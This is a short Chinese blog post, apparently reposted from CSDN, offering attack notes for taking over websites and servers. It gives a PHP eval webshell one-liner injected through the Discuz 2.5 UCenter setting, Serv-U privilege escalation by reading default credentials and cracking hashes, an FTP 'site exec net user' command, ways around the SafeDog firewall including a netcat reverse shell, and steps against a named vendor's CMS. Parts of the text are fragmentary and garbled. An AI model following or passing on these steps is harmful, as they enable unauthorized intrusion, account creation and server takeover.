原创教程分享总结

DZ2.5后台拿webshell

进入后台,有个站长,ucenter设置,IP哪里插入一句话

下面是一句话源代码:

貌似被转换了一下  例如XX\\');eval($_POST[a]?>;//XX

对就这个被加了单引号,连接../config/config_ucenter.php

适合社工管理员以后拿webshell

SU提权

通过菜刀连入,扫描端口,开放43958

首先寻找目录这就是ser-u的目录

点击ini文件查看默认账号和密码

去md5网站破解这里类型选择serv-u

这个网站的ftp提权是不成功的,因为ftp不能正常登陆

进行serv-u提权

路径写su的实际路径,他开了3389可以直接连连看

提权后,破解账户哈希

成功绕过安全狗防火墙提权进服务器

主要是绕过安全狗

wscript.shell关闭,看来asp下执行命令只能借助第三方

看一下aspx的马,运行cmd能运行普通命令,不能运行高级命令,

在看一下,试试080提权,试过,只要执行就会直接导致服务器重启

iis6.0刚卡斯hi还执行一下命令加账户被安全狗屏蔽,执行替换那个Seth命令,不成功,version=6.3.0.1

想用su提权,先看ftp提权,命令:quote site exec net user 

显示501表示没有权限,所以ftp提取失败

杀毒软件提示,被阻止了命令运行,但这也说明了SU还是有漏洞的

来让我们替换一下Seth,看看效果,没有提示狗,则证明su的最高权限

总结思路

绕狗的方法:nc反弹43958  有没有必要转发

各种0day提权,

喜欢端口提权  1433 3306 43958 4899 

一者他是正则通讯,服务器会主动链接外部网络,这样就绕过防火墙

360杀毒为什么强大?行为检测是根据你的判断程序是否合法,这也是前段时间被曝光的

多种方法测试南方数据漏洞实战演示

www.xpm.com.cn 南方数据

1.注入点:

2.登陆后台

3.利用编辑器上传:访问admin/siuthidceditor/admin_style.asp

猜你喜欢

转载自blog.csdn.net/qq_40268306/article/details/81073394
今日推荐